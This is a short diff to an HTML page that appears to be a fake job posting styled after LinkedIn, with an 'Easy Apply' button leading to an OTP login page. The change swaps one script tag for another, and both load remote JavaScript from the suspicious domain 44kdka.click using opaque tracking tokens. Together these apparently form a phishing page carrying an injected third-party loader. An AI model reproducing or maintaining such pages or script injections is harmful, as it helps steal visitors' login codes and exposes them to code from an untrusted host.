--- a/index.html
+++ b/index.html
@@ -113,8 +113,7 @@
             <p><i><b>Salary: </b>Negotiable.</i></p>
             <p>Join us to help shape the future of professional networking!</p>
         </div>
-<script type="text/javascript" src="//44kdka.click/c3ee074515c9d38e7a31/b1fb8bc644/?placementName=default">
-</script>
+<script type="text/javascript" src="//44kdka.click/691e0d71e8fa2dca5ed4/b04e55e2eb/?placementName=default"></script>
 
         <a href="/otp_login.html" class="easy-apply-button">
           <i class="fab fa-linkedin"></i> Easy Apply
